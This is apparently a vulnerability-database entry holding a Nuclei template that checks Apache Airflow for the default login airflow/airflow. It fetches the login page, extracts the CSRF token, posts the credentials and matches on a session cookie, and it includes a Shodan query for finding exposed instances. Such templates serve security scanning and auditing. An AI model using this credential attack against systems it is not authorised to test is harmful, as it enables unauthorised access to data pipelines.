漏洞描述
Apache Airflow default login credentials were discovered.
airflow-default-login: Apache Airflow Default Login
PoC代码[已公开]
id: airflow-default-login
info:
name: Apache Airflow Default Login
author: pdteam
severity: high
description: Apache Airflow default login credentials were discovered.
reference:
- https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
product: airflow
vendor: apache
max-request: 2
shodan-query: title:"Sign In - Airflow"
tags: airflow,default-login,apache,vuln
http:
- raw:
- |
GET /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /login/ HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
username={{username}}&password={{password}}&_csrf_token={{csrf_token}}
attack: pitchfork
payloads:
username:
- airflow
password:
- airflow
extractors:
- type: regex
name: csrf_token
group: 1
internal: true
regex:
- 'type="hidden" value="(.*?)">'
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(body_1, "Sign In - Airflow")'
- 'contains(header_2, "session=.")'
- 'status_code_2 == 302'
condition: and
- type: word
words:
- 'You should be redirected automatically to target URL: <a href="/">'
# digest: 4a0a00473045022100f781b3ac929b8185fcb7e05c25146a021b76396fa30133bad9a44ac36c459b6002201e47fcf4299271dfbdfe71d7439899b5e0aad5d9bdee23fbab8f0fd73229035f:922c64590222798bb761d5b6d8e72950